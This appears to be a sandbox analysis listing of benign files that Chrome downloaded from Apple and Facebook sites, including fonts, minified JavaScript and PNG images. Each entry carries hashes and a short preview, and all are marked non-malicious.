                                                                                                                                                                                                                                SHA-512:257279598503AA3203ADA4A1A29CFA550F0485D3F7231E815A3734405D6BA18472D3E3F248CABDF39A774BF9B752D83218244F578D2FECA2C33711AA53888C01
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Text/v2/sf-pro-text_regular.woff2
                                                                                                                                                                                                                                Preview:wOF2.......|....../0...............................&..H.`*H...>...,..c.6.$..$..(.. ?meta....@. 8.t[;5..*Cng....5.P........-..3.j......1.c..6@..;.......FI}..#.........a.....{0.w.. .fd.i.K.+..p.cL.b]YJ.%..+...c.HF4.ett....=...N......."F......../p,1Z...V$...)^.M..-M%..y/|.^I......;..>..%...Jl....4.L%....<.l.,.:..u.Wy......:W.F.....}j,. V......-.U.F...8Q..Z}^t{x7..*....j.]-..V.]..7.).....Zqt..kD...~.......dG.U..b.V1S..8......Q...D7.]....n.9b'*....="........&...OtG..R......S._.D$.1d..&...9..=.l..yQ.._J.5.{.T.6TX...\..NX.....#.tqR8L.iDuRkW..2hUa)..7.+........Y...!.........z.J.5U6..C......R..;CN....=..\...j......o...[..P.....{@.L........Y....B..?.*.;.f..Y...j.]...`..$.iW0=.9Yue.xH7....5F.o6.._[......K.,...-..J[.f!*w...VaT.r..\..^TXq....S..G..6...n]l..TA0..0A,D1....R.|...S?..v...!1Z.lR.......5.LF.....H=..X......`$....`0....F]..m..1...i.S.x..Vc.v?..DQ_&..(.(.......3.........K....`.....E.......n.?..5L...5P.c.( .*..EAQ.....c.F.+.l.s.3..J.k:....+...}v..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11608)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):49300
                                                                                                                                                                                                                                Entropy (8bit):5.479518690240178
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:nVKzWIP4JeRBx5AJsNfWVO35t8w7xMYdbXV/qrqp3YWuScV178GfjCN+:Vg4hJsNfWV+h67BLCc
                                                                                                                                                                                                                                MD5:F2BC7A733B7E080B2ABD68E746BD35A9
                                                                                                                                                                                                                                SHA1:9AC345509086964E48D5410DD487B17B7395E077
                                                                                                                                                                                                                                SHA-256:2948C27949C446E608F107D7DEAE7B84DF1A5D62929D0363788996171FFB827A
                                                                                                                                                                                                                                SHA-512:52EB4A281E85D0D54CC6EBB06454C2514ACA79AACC53EF94046D7F85B5E62B58963845CE0BB2D2984F1F58B5DA81CD05C6CCB9B514C2777E5371D1C734BC1EC0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y6/r/a2il9m3oo2U.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,b,c){return this._getArbiterInstance().inform(a,b,c)},subscribe:function(a,b,c){return this._getArbiterInstance().subscribe(a,b,c)},subscribeOnce:function(a,b,c){return this._getArbiterInstance().subscribeOnce(a,b,c)},unsubscribe:function(a){this._getArbiterInstance().unsubscribe(a)},unsubscribeCurrentSubscription:function(){this._getArbiterInstance().unsubscribeCurrentSubscription()},releaseCurrentPersistentEvent:function(){this._getArbiterInstance().releaseCurrentPersistentEvent()},registerCallback:function(a,b){return this._getArbiterInstance().registerCallback(a,b)},query:function(a){return this._getArbiterInstance().query(a)}};b=a;g["default"]=b}),98);.__d("FbtResultBase",[],(function(a,b,c,d,e,f){"use strict";var g=function(){fu
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (878)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1441
                                                                                                                                                                                                                                Entropy (8bit):4.923625217494772
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ildT+lZadfID4P9Gpl3fBzR1SQLA2RAMRMT6XFKg/7/GpSw8G9bFw4YZn:ild2ZbI9GpvRQQ82OUugFKg/7/Gpj8Gw
                                                                                                                                                                                                                                MD5:188415311B33E9DFC79C3CC6147ED47D
                                                                                                                                                                                                                                SHA1:486B072C15EA89B3D39F607F92327F1A338254B0
                                                                                                                                                                                                                                SHA-256:8B3DA2AC016CE7C6F38F10052C50C7958935276BD5885009716FEC7B3D8ED681
                                                                                                                                                                                                                                SHA-512:DD95C297899B58507824F3A3129E060BBA8A9F7D2045526DC66DAB584D19571069D84EB2591B7FBE71A0FBA96DD1BE1A32995184D37FCA9A1F699FC71739644B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.356.4d5c8581cf04321d0a9b.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[356],{84356:function(t){var o="touch".function s(t,o){this._target=t||document.body,this._attr=o||"data-focus-method",this._focusMethod=this._lastFocusMethod=!1,this._onKeyDown=this._onKeyDown.bind(this),this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onFocus=this._onFocus.bind(this),this._onBlur=this._onBlur.bind(this),this._onWindowBlur=this._onWindowBlur.bind(this),this._bindEvents()}var n=s.prototype.n._bindEvents=function(){this._target.addEventListener("keydown",this._onKeyDown,!0),this._target.addEventListener("mousedown",this._onMouseDown,!0),this._target.addEventListener("touchstart",this._onTouchStart,!0),this._target.addEventListener("focus",this._onFocus,!0),this._target.addEventListener("blur",this._onBlur,!0),window.addEventListener("blur",this._onWindowBlur)},n._onKeyDown=function(t){this._focusMethod="key"},n._onMouseD
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                                Entropy (8bit):6.477824578243478
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPop3MRjT8FMRN2CMnmB1Chy8Zycp:6v/7gp3Mn+ML11ChHJ
                                                                                                                                                                                                                                MD5:893DE2346D9AA49AC73EDDCED7CFCC9B
                                                                                                                                                                                                                                SHA1:8B7A4CCB34076EBFB3D2DAC919F7A47849C425A9
                                                                                                                                                                                                                                SHA-256:65CE449FBA7DAD6F9F1AD9C7D74DACF6B74B671D46210676C908CCB636DD01DD
                                                                                                                                                                                                                                SHA-512:C25E40CEBA5B6C3D471AC9C934FDF63D839AD73E9BDBA9F9EF39685342BF1EA020CE45777019037ED71081BCDFAF24D2E485974D3553AB81DF428B89542224D4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/button_glyphs/video_control_pause_white-893de2346d9aa49ac73eddced7cfcc9b.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB.........IDATX.....0.E.t.($ev.27.l....:.....l.|AsO.._..U....m.....}.:...EG.v..R75a.u.vg...ua....K}X.r&H. A....$.....D.=<....u..F.`.19....t...i.7...{.A..."e......IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6074)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):42228
                                                                                                                                                                                                                                Entropy (8bit):5.4392336436603115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xS0vaKKc046ua0iuyZC7sy2fOq8sMwjwr0ifGTpWeQs1bA6Mw5Z49xr+3hYmJ:o0vaKKJ2yZC7sy2fOqOwjwr0ifGTpWeP
                                                                                                                                                                                                                                MD5:7474DE3D2949B8F685DF177F250F6A9D
                                                                                                                                                                                                                                SHA1:DA6E1C04754418FC9726F4B937789887F3AA63E7
                                                                                                                                                                                                                                SHA-256:A1869D4A2B4EA39126F3C40B4830EBBD0C04B0C9F8E55B0FD206EB996EEB6903
                                                                                                                                                                                                                                SHA-512:BFB102814A697AF07B0CE2B8D11C7519F1CFDBE16296E73BACAC2E98F04518373531AF45996153EB1980ED40F866068D91234C761D7CF8E08860C41846F9CA4B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsAdoptionCloseButton.react",["BUICloseButton.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){a.size;a=babelHelpers.objectWithoutPropertiesLoose(a,["size"]);return i.jsx(c("BUICloseButton.react"),babelHelpers["extends"]({size:"large"},a))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("ContextualDialog.react",["ReactAbstractContextualDialog","ReactLayer"],(function(a,b,c,d,e,f,g){a=d("ReactLayer").createClass(d("ReactAbstractContextualDialog").createSpec({displayName:"ReactContextualDialog"}));b=a;g["default"]=b}),98);.__d("AdsPopoverLink_DEPRECATED.react",["cx","ix","AdsFBIconDownsized.react","BUICloseButton.react","ContextualDialog.react","Image.react","LayerFadeOnHide","UserAgent_DEPRECATED","clearTimeout","joinClasses","react","setTimeout"],(function(a,b,c,d,e,f,g,h,i){"use strict";var j,k=j||(j=d("react"));a=j.Component;var l={imgNormal:i("403740"),imgHover:i("403741")};b=function(a){babelHelpers
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (21389)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):176168
                                                                                                                                                                                                                                Entropy (8bit):5.469790123757049
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:tlPfuAXw7jHWvEPC6xUoAKLZb3AKj5NLJo9v5MF9Vm:j6WWVAKtb3HHY
                                                                                                                                                                                                                                MD5:A6F812862FA6C458FE301D0C0E2A1FD8
                                                                                                                                                                                                                                SHA1:99E5ED7001CF5635FF146751EF7F982BA9FB5BBD
                                                                                                                                                                                                                                SHA-256:A4949472640ABB50A0BA8069D76C7DCAC8276919D924F59DAF891C65F2BAF306
                                                                                                                                                                                                                                SHA-512:784BF8DD18377C8CBDF4453D2649B63AAAE3C410D4DF130FEDC66C38954F45681DC2BC19B4EDC0CBB557880EBE6D49C87088E5A5E20A796344D4CD8B10DD7C15
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);.__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b("cr:9989").post("logger:"+c,d,a)},create:h}}a=h();c=a;g["default"]=c}),98);.__d("CometEnvironmentSite",[],(function(a,b,c,d,e,f){a=Object.freeze({NONE:0,GENERIC_COMET:1,COMET_ON_MOBILE:2,COMET_ON_INSTAGRAM:3,FB_ACCOUNTS_CENTER:5,CANVAS:6,IG_WWW:7,FRL_ACCOUNTS_CENTER:8,NOVI_CHECKOUT:9,ENTERPRISE_CENTER:10,BIZ_WEB:11,BUSINESS_FB:12,HORIZON_WORLDS:14,FB_WEB:15,WHATSAPP:17,META_DOT_COM:18,OCULUS_DOT_COM:19,FRL_FAMILY_CENTER:20,WHATSAPP_FAQ:23,IG_ACCOUNTS_CENTER:24,ADS_MANAGER_ON_BLUE:25,MESSENGER_FAMILY_CENTER:26,META_WORK_PORTFOLIO:27,BARCELONA_WEB:29,FB_FAMILY_CENTER:30,CANDIDATE_PORTAL:31,META_HELP:32,FRL_AUTH:33,META_LLAMA:34,IG_GEN_AI_STUDIO:35,FB_GEN_AI_STUDIO:36,IG_FAMILY_CENTER:37,IG_PRIVACY_CENTER:38,IG_HELP_CENTER:39,ABOUT_META
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 564 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10071
                                                                                                                                                                                                                                Entropy (8bit):7.891099481159603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qg2y7LIhCKi1ihWVEYumqlG+fhNmCdLhpUP4FKxozeMTGiI2TUiut8:qfy4hl67VXqg+fh39WxyeMzTU8
                                                                                                                                                                                                                                MD5:F06B908907D5D4F2AAF733E2BEE7EA8E
                                                                                                                                                                                                                                SHA1:073DCF14C7C312BE5DAEB4FA2113429E019FDBC7
                                                                                                                                                                                                                                SHA-256:583714033CAB0D76045A8D4BBFB2326983F40D5C2CFA239E9527DA9617686E6B
                                                                                                                                                                                                                                SHA-512:32CABBC903EC76538C30B4734924267BD1364236629ABFB36919CFE4BE498360A6C0D3142BBC8593B8418B807336912E612E56E358993CA80E6F93947E9434D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...4...........t.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs...#...#.x.?v....tIME.......LIJ.....bKGD............&!IDATx.......;qT.$...E..qx.#"(..."!.u%..C0..D....r.(.k.I`...!.G1..M|.....<.%" ....b...35)..{.nUWW.. 3]]}.......D$.../...UW]5n.Q......B.!....z....a.EB...2q..5s........!..BH.f........>|.w...X....C.!..8.c`.'6......w66!..B....I...De.N......=[F..-....N.:.i.....!..B...i........y......E......cY... 18...B.!.D...V&M.T0.&Hj|e.k..&...!..B....i.y.A.%.+...A}..ac.B.!$v........q.3Af0...&..BH...w~..FIh.....B.!..3..-5H....L...B.!$m....'.......y3.!..BH.sj0..)4......$..BHZ@.BQ...q'.sj6!..B.$\(J...h....B.!i.]..+.8.Ah.j...L.!..4..^....3fa..8..0>..#..BH.i...B3y...B..M.n"..BH).;a.v^h.!....|.."..BHZ.1b..Q..g.*....B.!...wM..g..?C.!..BH)M...B.!.BC.!..B.!..B....B.!.BC.!..B....B.!.BC.!..B.!..B...BC2GMM..5K.-[&.7o..>......O>)#G....J.}...L....}.6......B..s........w.}.r.J.c.............*~....D.I.c..I...$....t..r..rh.&<.e.:
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (750)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2169
                                                                                                                                                                                                                                Entropy (8bit):4.9548772147686115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:ildRbgqluYoCoLUmledemlxUlIUvfALSAl/lmmqlmWlfBlAlVlWlgwheAYf9hbF5:INx4gd/d4fTvsaMefp5oD
                                                                                                                                                                                                                                MD5:89F8EE167E82FADB507197C109ED684B
                                                                                                                                                                                                                                SHA1:F5A728E7805C71BAE1A8786921AB2735AB07C15E
                                                                                                                                                                                                                                SHA-256:0B70D5380DCC5A0C4BDD30DE4D68C4B0F598EB4EA92BEEC1B6D5F0852BD96D22
                                                                                                                                                                                                                                SHA-512:BC12D7CB827E364176A691C2ED5C73A481547C572A0C00E5FF6B8BD8E698AC7DA96F2D8DA08485F9363F98A1F21338E61A9E813A31DF0A2EB7E96D43A902E5CE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[961],{54961:function(n,e,t){t.r(e),t.d(e,{cleanup:function(){return c},environment:function(){return o},eventQueue:function(){return i},eventRecorder:function(){return r},immediateEventRecorder:function(){return u}}).var i=t(71026),o={_document:function(){if("undefined"!=typeof document)return document.throw"metricskit-delegates-html.environment HTML delegate 'document' object not found"},_window:function(){if("undefined"!=typeof window)return window.throw"metricskit-delegates-html.environment HTML delegate 'window' object not found"},cookie:function(){return o._window().document.cookie},pageUrl:function(){return o._window().location.href},parentPageUrl:function(){var n,e=o._window(),t=e.parent.if(t!==e)try{n=t.location.href}catch(e){n=o._document().referrer}return n},pixelRatio:function(){return o._window().devicePixelRatio},screenHeight:function(){return o._window().screen.height},scre
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):92
                                                                                                                                                                                                                                Entropy (8bit):5.04228009763489
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:+u0T3+Dr7ScTQPvmV1K8RAsvWrY:RMe/bakKAAsuM
                                                                                                                                                                                                                                MD5:D2CCF9A159BFFCD67497EE05C703FE8C
                                                                                                                                                                                                                                SHA1:4283C89BE6EA6A4BDC711A46498DA5756B409190
                                                                                                                                                                                                                                SHA-256:393968BA50EFD2DF35B0041F8491A8B371027C637EA56D1610F2BF09CD5F0D09
                                                                                                                                                                                                                                SHA-512:258ACFE2F8B9B461CA8AB9ED80BF8A43D079E55D2EDCDC4512B883663DA9D58C71E03A25C698FD72C81147B3E24FAFA3F50FF922963BA05E4A9C93CFDB84D522
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkbMnFS9SzlUhIFDYOoWz0SBQ3Fk8Qk?alt=proto
                                                                                                                                                                                                                                Preview:CkEKDQ2DqFs9GgQIVhgCIAEKMA3Fk8QkGgQISxgCKiMIClIfChVAIS4jJCpfLSY/KyUvLF4pOj18figQARj/////Dw==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (17932)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):18154
                                                                                                                                                                                                                                Entropy (8bit):4.913619694300307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:7YNwwESzQnZKETYN2COZYcUBQA4LxWm3CKgB+2RR:yhNzrXNAtU9ArbM+AR
                                                                                                                                                                                                                                MD5:73111912F4B4F7A5B5501DC74D50025B
                                                                                                                                                                                                                                SHA1:94BAE7BE09CAE37C16321425B151EB0DE4592F0D
                                                                                                                                                                                                                                SHA-256:AB6777F622DCE53EFA7D6A93432292AFBA7757445EB4CC111B25810882375B98
                                                                                                                                                                                                                                SHA-512:DB7A6BF34BD0E3C739917EAD6BC24D31B63420498476756E99AAB232F7D14A9D0A86DD90764440089B66B2D544A327884F17B566DD02EB783360DA749789B738
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(this.mode=c),this.sBox0=a.sBox0.slice(),this.sBox1=a.sBox1.slice(),this.sBox2=a.sBox2.slice(),this.sBox3=a.sBox3.slice(),this.pArray=a.pArray.slice(),this.generateSubkeys(b)};a.prototype={sBox0:null,sBox1:null,sBox2:null,sBox3:null,pArray:null,key:null,mode:"ecb",iv:"abc12345",keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encrypt:function(a,b){if(this.mode==="ecb")return this.encryptECB(a);if(this.mode==="cbc")return this.encryptCBC(a,b);throw new Error("\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0440\u0435\u0436\u0438\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.")},decrypt:function(a,b){if(this.mode==="ecb")return this.decryptECB(a);if(this.mode==="cbc")retur
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6999)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):34922
                                                                                                                                                                                                                                Entropy (8bit):5.359620627574951
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+YEHVIVIVeVoVeVjVDVjVjVMV9:RIT7hsZwuvLN54WAcl5100eUeZ5ZZAK+
                                                                                                                                                                                                                                MD5:15710A1D3C11151B3EAC2EC844FA03DD
                                                                                                                                                                                                                                SHA1:C79A4AC27A1E3017BBEC229031ED4A9976D26A15
                                                                                                                                                                                                                                SHA-256:27928DD5441B4297F3B11F51CBEC9298F03B891224C706574BE55E7284CE9B8A
                                                                                                                                                                                                                                SHA-512:09AA6213CF12B51A701E4FB6C74C1105DC67422EC9CED201DEC01DC271548EAD020DE95F757DF0AE5FD7BE62F8D19C26193EEFD0BF4744F858678EE89D6C93C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (3256)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):30189
                                                                                                                                                                                                                                Entropy (8bit):5.396190125614001
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:kAEuymY99x3Yx9YXMAuzwqxaf4XByCL0xkc:P3i37T7FQ0CL0xp
                                                                                                                                                                                                                                MD5:56B7FCA02CFACE9E71C2AE38EB25AFE1
                                                                                                                                                                                                                                SHA1:D7A4B3ADAE9B1619379EFE66711B2DAC7B3F8F45
                                                                                                                                                                                                                                SHA-256:0D410C6C2E55A84B012837257DD6239044DB1621E0F6DE52EA4E332E898F8E34
                                                                                                                                                                                                                                SHA-512:EE93C53CAA66B8176631F44507B5A7FE7130093CD4EBB6083CB8866703E39030CEE10C97EF9E993FBD589F77F3FAFF3405C738289D7BD67D44E5E17F2BFDD038
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("LynxGeneration",["LinkshimHandlerConfig","URI"],(function(a,b,c,d,e,f,g){var h,i=new(h||(h=c("URI")))(c("LinkshimHandlerConfig").linkshim_path).setDomain(c("LinkshimHandlerConfig").linkshim_host),j={getShimURI:function(){return new(h||(h=c("URI")))(i)},getLynxURIProtocol:function(a){return c("LinkshimHandlerConfig").always_use_https?"https":a.getProtocol()==="http"?"http":"https"},getShimmedHref:function(a,b,d){var e;a=new(h||(h=c("URI")))(a);var f=j.getLynxURIProtocol(a);a=j.getShimURI().setQueryData((e={},e[c("LinkshimHandlerConfig").linkshim_url_param]=a.toString(),e[c("LinkshimHandlerConfig").linkshim_enc_param]=b,e)).setProtocol(f);b=d==null?void 0:d.trackingNodes;e=d==null?void 0:d.callbacks;b&&b.length&&(a=a.addQueryData("__tn__",b.join("")));e&&e.length&&(a=a.addQueryData("c",e));return a}};a=j;g["default"]=a}),98);.__d("NonFBLinkReferrerProtector",["$","LinkshimHandlerConfig","Parent","URI","cr:5662","setTimeout"],(function(a,b,c,d,e,f){"use strict";var
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12570)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):110588
                                                                                                                                                                                                                                Entropy (8bit):5.284527927126575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:dgxM88ofq9SwUu3aLYDfxnCFhRhpfvvrTxbM2Zgs1Keypi:OOJolwUmhC/RPfBD1Kemi
                                                                                                                                                                                                                                MD5:04BBACBF1A57E9D2BD0EA3D9A0D51358
                                                                                                                                                                                                                                SHA1:586A99D75A4A0EEFBE18D616DF5B9FACF84B5D4E
                                                                                                                                                                                                                                SHA-256:F31A9F9C6587ECF268F553462016F2E3E335BE3A83C0C167E391BA5B7FC58092
                                                                                                                                                                                                                                SHA-512:17DA648EB102098F27FA801A859C81A01F9B76630B1274DCF760A8509682942C67BD28527471256668B47AE710F8C9BE67494AF5E4974E68831918BFDD332F3D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ARIA",["DOM","emptyFunction","ge","getOrCreateDOMID","joinClasses"],(function(a,b,c,d,e,f,g){var h,i,j=function(){h=c("ge")("ariaAssertiveAlert"),h||(h=c("DOM").create("div",{id:"ariaAssertiveAlert",className:c("joinClasses")("accessible_elem","accessible_elem_offset"),"aria-live":"assertive"}),c("DOM").appendContent(document.body,h)),i=c("ge")("ariaPoliteAlert"),i||(i=h.cloneNode(!1),i.setAttribute("id","ariaPoliteAlert"),i.setAttribute("aria-live","polite"),c("DOM").appendContent(document.body,i)),j=c("emptyFunction")};function k(a,b){j();b=b?h:i;c("DOM").setContent(b,a)}function a(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-controls",f)}function b(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-describedby",
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (26358)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):799835
                                                                                                                                                                                                                                Entropy (8bit):5.532038526722017
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:Eb8r+JY5qRwyeqyyO6wzXPxdaHXHjvNi6ScwOt8NQtj84jhfX9N4N85qdNIS1Bp3:hyMoj84jhfETy64zwuc0rXlxs
                                                                                                                                                                                                                                MD5:3BCF65A9F70F04BC976D1E78D611C8B8
                                                                                                                                                                                                                                SHA1:073937B502DC86DD2C2C0935B9B6F8F37F687294
                                                                                                                                                                                                                                SHA-256:853CEC1FB0436FBC386B2E2A11401234F34F372CDDC2B0EFB8065413D023ED2B
                                                                                                                                                                                                                                SHA-512:791552EFE0101686E47D1538C5366190E0BFE43435B492BF9D6C1C740815A9BD179D303067E7A93436B7ED5C68EE71CD9CF279B20B969C3014624A97DDE0F2E9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/uz/app/instagram/id389801252
